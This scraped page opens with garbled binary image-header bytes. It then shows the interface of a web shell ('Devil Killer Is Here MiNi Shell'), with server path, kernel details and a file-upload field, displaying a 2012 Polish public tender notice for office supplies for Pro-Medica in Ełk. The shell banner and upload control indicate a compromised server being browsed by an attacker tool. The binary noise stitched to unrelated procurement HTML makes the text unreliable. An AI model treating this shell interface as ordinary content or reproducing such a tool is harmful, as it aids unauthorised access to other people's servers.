JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120620/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120620/211178-N-2012.html

<p class="kh_header"><b>Ełk: 1. dostawa artykułów biurowych i papierniczych na potrzeby Pro-Medica w Ełku Sp. z o. o. przez okres 12 miesięcy</b><br>
<b>Numer ogłoszenia: 211178 - 2012; data zamieszczenia: 20.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> "Pro-Medica" w Ełku Sp. z o.o. , ul. Baranki 24, 19-300 Ełk, woj. warmińsko-mazurskie, tel. 087 621 96 50, faks 087 621 96 33.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.promedica.elk.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Pro-Medica w Ełku Sp. z o.o..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> 1. dostawa artykułów biurowych i papierniczych na potrzeby Pro-Medica w Ełku Sp. z o. o. przez okres 12 miesięcy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> POZ.	NAZWA	J.M.	ILOŚĆ
1	ANTYRAMA A4	SZT	40
2	BLOCZEK SAMOPRZYLEPNY 51 X 38	SZT	150
3	BLOCZEK SAMOPRZYLEPNY 51 X 76	SZT	200
4	BLOK LISTOWY A4	SZT	40
5	BLOK LISTOWY A5	SZT	30
6	BLOK TECHNICZNY   A 4    KOLOROWY	SZT	5
7	BLOK TECHNICZNY A3 KOLOROWY	SZT	4
8	BLOK TECHNICZNY A4	SZT	15
9	CIENKOPIS  PERMANENTNY RÓŻNE KOLORY	SZT	250
10	DATOWNIK AUTOMATYCZNY	SZT	10
11	DŁUGOPISY	SZT	600
12	DŁUGOPISY ŻELOWE	SZT	200
13	DYPLOMY OZDOBNE 160-180G A4	SZT	100
14	DZIENNIK KORESPONDENCYJNY  A4	SZT	15
15	DZIURKACZE	SZT	10
16	FOLIA DO BINDOWANIA EXLUSIVE A4 PLASTIKOWE, 0,40 MM 50 SZT W OP.	OP	15
17	FOLIA DO LAMINOWANIA FORMAT 60X95MM  175 MIC	SZT	500
18	FOLIA DO LAMINOWANIA FORMAT A 3 175 MIC	SZT	500
19	FOLIA DO LAMINOWANIA FORMAT A 4  175 MIC	SZT	500
20	FOLIA DO LAMINOWANIA FORMAT A5 175 MIC	SZT	500
21	FOLIA PRZEZROCZYSTA DO BINDOWANIA A4/140MIC	OP	2
22	FOLIA STRETCH	SZT	5
23	FOLIOPIS WODOODPORNY 0,4-0,5MM	SZT	450
24	GĄBKA DO TABLICY SUCHOŚCIERALNEJ	SZT	15
25	GRZBIET DRUTOWY DO BINDOWANIA 1/2	SZT	300
26	GRZBIET DRUTOWY DO BINDOWANIA 7/16	SZT	300
27	GRZBIET DRUTOWY DO BINDOWANIA 9/16	SZT	300
28	GUMKA	SZT	30
29	KALANDARZE KSIĄŻKOWE A4	SZT	7
30	KALENDARZE STOJĄCE PIONOWE	SZT	35
31	KALENDARZE STOJĄCE POZIOME	SZT	35
32	KALENDZARZE KSIĄZKOWE A5	SZT	20
33	KALKA MASZYNOWA A4	SZT	10
34	KALKA OŁÓWKOWA A4	SZT	10
35	KALKULATOR TYP CASIO GX- 12V LUB RÓWNOWAŻNY	SZT	15
36	KARTECZKI SAMOPRZYLEPNE- ZAKŁADKI INDEKSUJĄCE KOLOROWE /50SZT	OP	15
37	KARTECZKI W POJEMNIKACH KOLOROWE	SZT	50
38	KARTKI -WKŁADY UZUPEŁNIAJĄCE  DO POJEMNIKÓW	SZT	150
39	KLEJ BIUROWY W TUBCE	SZT	80
40	KLEJ UNIWERSALNY CR 1 KG	SZT	10
41	KLEJ W PŁYNIE	SZT	100
42	KLEJ W SZTYFCIE	SZT	200
43	KLIPS DO IDENTYFIKATORA Z PASKIEM	SZT	300
44	KOPERTA BIAŁA SK 160X220	SZT	4000
45	KOPERTY BIAŁE DO LISTÓW SK	SZT	14000
46	KOPERTY BIAŁE NK 160X220	SZT	2000
47	KOPERTY BIAŁE NK 320X227	SZT	300
48	KOPERTY BIAŁE NK DO LISTÓW	SZT	700
49	KOPERTY BIAŁE SK A4	SZT	4000
50	KOPERTY DL SK BEZ OKIENKA	SZT	4000
51	KOPERTY DO CD/DVD TRANSPORTOWE, BĄBELKOWE	SZT	50
52	KOPERTY DO DYSKIETEK TRANSPOTROWE, BĄBELKOWE	SZT	50
53	KOPERTY SZARE NK  225X320	SZT	1000
54	KOPERTY SZARE NK 190X270	SZT	20000
55	KOPERTY SZARE NK 250X175	SZT	20000
56	KOPERTY SZARE NK 250X310	SZT	1000
57	KOPERTY SZARE NK 40X50	SZT	1000
58	KOPERTY TRANSPORTOWE Z WYPEŁNIENIEM    A 3	SZT	50
59	KOPERTY TRANSPORTOWE Z WYPEŁNIENIEM   A4	SZT	300
60	KOPERTY TRANSPORTOWE Z WYPEŁNIENIEM   A5	SZT	300
61	KOREKTOR W PIÓRZE	SZT	120
62	KOREKTOR W TAŚMIE	SZT	5
63	KREDKI OŁÓWKOWE  6-O KOLOROWE	OP	5
64	LINIJKA 20CM PLAST.	SZT	10
65	LINIJKA 30CM PLAST.	SZT	10
66	MAGNESY DO TABLICY 1 OP=10SZT	OP	20
67	MARKER DO PIS. NA RĘKAWACH FOLIOWYCH  0,75MM  /STER/	SZT	20
68	MARKER DO TABLICY SUCHOŚCIERALNEJ	SZT	60
69	MARKERY RÓŻNE KOLORY 	SZT	400
70	MAZAKI /SZT./ KOLOROWE	SZT	500
71	NOŻYCZKI BIUROWE	SZT	20
72	NOŻYKI Z WYSUWANYM OSTRZEM	SZT	4
73	NÓŻ DO KOPERT- PAPIERU	SZT	4
74	NUMERATOR/ AUTOMATYCZNY PLASTYKOWY MAŁY	SZT	5
75	OBWOLUTA A4 / KOSZULKA/  100SZT	OP	200
76	OBWOLUTA A4 / KOSZULKA/ GRUBA FOLIA/ 10SZT	OP	5
77	OBWOLUTA A5 /KOSZULKA/   100SZT	OP	20
78	OKŁADKA DO BINDOWANIA EXLUSIVE A4 PLASTIKOWE 0,40MM 50SZT	OP	15
79	OKŁADKA PRZEZROCZYSTA A4 DO BINDOWANIA 140 MIC/ 100 SZT	OP	2
80	OŁÓWKI	SZT	60
81	PAPIER - ETYKIETY SAMOPRZYLEPNE  105 X 74MM, BUAŁE 100 ARK. W OP.	OP.	2
82	PAPIER - ETYKIETY SAMOPRZYLEPNE 70 X 50,4 MM, BIAŁE 100 ARK. W OP.	OP.	2
83	PAPIER - ETYKIETY SAMOPRZYLEPNE A 4 BIAŁE 100 ARK. W OP.	OP.	2
84	PAPIER KARTON OFFSETOWY A4/170GRBIAŁY 1 ryza = 250 szt	OP	6
85	PAPIER KOLOR KSEROGRAFICZNY A4 (NIEBIESKI JASNY) / 500 SZT	RYZA	4
86	PAPIER KOLOR KSEROGRAFICZNY A4 (POMARAŃCZOWY) / 500 SZT	RYZA	4
87	PAPIER KOLOR KSEROGRAFICZNY A4 (ZIELONY) / 500 SZT	RYZA	4
88	PAPIER KSERO BIAŁY A4 160GR / 250 SZT	RYZA	30
89	PAPIER KSERO BIAŁY A4 250GR / 250 SZT	OP	25
90	PAPIER KSERP FORMAT A4 100G/M2	RYZA	5
91	PAPIER PAKOWY	ARK	25
92	PAPIER SAMOKOPIUJĄCY BIAŁY A4 / 100 SZT	OP	500
93	PAPIER ŚNIADANIOWY	SZT	100
94	PAPIER XERO A3	RYZA	800
95	PAPIER XERO A4	RYZA	2500
96	PINEZKI  1OP= 10SZT	OP	40
97	PODUSZKA METALOWA DO STEMPLI	SZT	10
98	PODUSZKA ZWILŻĄCZ DO PALCÓW z gliceryną	SZT	5
99	POJEMNIK  STOJĄCY NA DOKUMENTY  A4 /TACKA/	SZT	100
100	POJEMNIK SPINACZE -MAGNETYCZNY	SZT	20
101	POJEMNIK STOJĄCY A4 PLASTIKOWY DO ARCHWIZACJI RÓŻNE KOLORY	SZT	20
102	POJEMNIK STOJĄCY DO ARCHIWIZACJI A4 Z KARTONU	SZT	100
103	PRZEKŁADKI DO SEGREGATORA 10 POZYCJI	SZT	30
104	PRZEKŁADKI DO SEGREGATORA 6 POZYCJI	SZT	4
105	PRZYBORNIK	SZT	20
106	PUDŁA ARCHIWALNE 11X36X25	SZT	1500
107	ROLKA DO MASZYNY CITIZEN 355 DP III 5,5CM	SZT	30
108	ROZSZYWACZ	SZT	20
109	SEGREGATORY A-4 SZEROKIE	SZT	300
110	SEGREGATORY A-4 WĄSKIE	SZT	200
111	SEGREGATORY A-5 SZEROKIE	SZT	30
112	SKŁADANKA KOMPUTEROWA (1) 240X12	SZT	8
113	SKŁADANKA KOMPUTEROWA (1+1) 240X12 BEZ NADRUKU	SZT	15
114	SKŁADANKA KOMPUTEROWA (1+2) 240X12 BEZ NADRUKU	SZT	10
115	SKOROSZYT A-4    2-U STRONNIE ZAPINANY	SZT	150
116	SKOROSZYT A-4 PCV Z ZAWIESZKĄ METALOWĄ	SZT	250
117	SKOROSZYT A-4 TEKTUROWY	SZT	100
118	SKOROSZYT A-4 WPINANY DO SEGREGATORA- TEKTUROWY	SZT	100
119	SKOROSZYT PCV Z ZAWIESZKĄ PLASTIKOWĄ	SZT	250
120	SKOROWIDZ A 4 twarda oprawa	SZT	10
121	SPINACZE 25MM	OP	700
122	SPINACZE 40MM KRZYŻAKI	OP	10
123	SPINACZE 50MM PROSTE	OP	10
124	SPINACZE 65MM KRZYŻAKI	OP	30
125	TABLICA KORKOWA  60X90	SZT	10
126	TABLICA KORKOWA 40X80	SZT	10
127	TAŚMA  PAPIEROWA SAMOPRZYLEPNA  4CM	SZT	10
128	TAŚMA BARWIĄCA CZARNO-CZERW. DO CITIZEN 355 DP III	SZT	20
129	TAŚMA DO FAXU PANASONIC KX-FP34321	SZT	4
130	TAŚMA DO MASZYNY OPTIMA SP 20	SZT	2
131	TAŚMA DO METKOWNICY 26X16  OP=5 ROLEK	OP	10
132	TAŚMA DWUSTRONNA	SZT	30
133	TAŚMA SAMOPRZYLEPNA  48X50	SZT	400
134	TAŚMA SAMOPRZYLEPNA 15X40	SZT	40
135	TAŚMA SAMOPRZYLEPNA 19X33	SZT	40
136	TAŚMA SAMOPRZYLEPNA DWUSTRONNA /GĄBKA/	SZT	10
137	TECZKA CLIPBOARD PODWÓJNY	SZT	150
138	TECZKA OFERTOWA	SZT	15
139	TECZKA PCV A-4 WIĄZANA	SZT	100
140	TECZKA PODAWCZA	SZT	2
141	TECZKA PRESZPANOWA NA RZEP	SZT	60
142	TECZKA TEKTUROWA A-4 NA GUMKĘ	SZT	1200
143	TECZKA TEKTUROWA A-4 WIĄZANA	SZT	400
144	TECZKA TEKTUROWA GRUBA NA GUMKĘ	SZT	30
145	TEMPERÓWKI	SZT	5
146	TUSZ DO NUMERATORÓW  O POJ 5ML	SZT	30
147	TUSZ DO STEMPLI - CZARNY	SZT	30
148	TUSZ DO STEMPLI - CZERWONY	SZT	10
149	TUSZ DO STEMPLI - FIOLETOWY	SZT	5
150	TUSZ DO STEMPLI - NIEBIESKI	SZT	30
151	WKŁADY DO DŁUGOPISÓW	SZT	500
152	WKŁADY ŻELOWE DO DŁUGOPISÓW	SZT	100
153	ZAKŁADKI INDEKSUJACE SAMOPRZYLEPNE	OP	25
154	ZAKREŚLACZ RÓŹNE  KOLORY	SZT	400
155	ZESZYT 16K A-5	SZT	30
156	ZESZYT 32K A5	SZT	40
157	ZESZYT 60K A5	SZT	60
158	ZESZYT 80K A5	SZT	40
159	ZESZYT 96K A4 MIĘKKA OPRAWA	SZT	20
160	ZESZYT 96K A4 TWARDA OPRAWA	SZT	60
161	ZESZYT 96K A5 TWARDA OPRAWA	SZT	30
162	ZSZYWACZ	SZT	50
163	ZSZYWACZ DO 100 KARTEK	SZT	10
164	ZSZYWACZ MAŁY DO 20 KARTEK	SZT	50
165	ZSZYWKI 23/8   OP=1000SZT	OP	20
166	ZSZYWKI 24/6  OP=1000SZT	OP	500
167	ZSZYWKI 9/14   OP=1000SZT	OP	10
168	ZSZYWKI MODEL 10  OP=1000SZT	OP	300
169	ZSZYWKI RAPID 44/8   OP=5000SZT	OP	5.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. 4.000,00 zł  ( słownie: cztery tysiące zł 00/100 )</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenia Wykonawcy o spełnieniu warunków udziału w Postępowaniu z art. 22 Prawa zamówień publicznych;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenia Wykonawcy o spełnieniu warunków udziału w Postępowaniu z art. 22 Prawa zamówień publicznych;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenia Wykonawcy o spełnieniu warunków udziału w Postępowaniu z art. 22 Prawa zamówień publicznych;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenia Wykonawcy o spełnieniu warunków udziału w Postępowaniu z art. 22 Prawa zamówień publicznych;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenia Wykonawcy o spełnieniu warunków udziału w Postępowaniu z art. 22 Prawa zamówień publicznych;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1)  Oświadczenie, w którym Wykonawca potwierdza, że jest związany ofertą przez okres 30 dni od dnia, w którym upływa termin składania ofert.
2)  Podpisany wzór umowy przez Osoby Uprawnione.
3)  Uzupełniony formularz cenowy oferty.
4)  Dowód wniesienia wadium.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.promedica.elk.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Pro-Medica w Ełku Sp. z o. o.;ul. Baranki 24; 19-300 Ełk ; pokój  V piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.06.2012 godzina 10:00, miejsce: Pro-Medica w Ełku Sp. z o. o.;ul. Baranki 24; 19-300 Ełk ;Sekretariat pokój 504; V piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com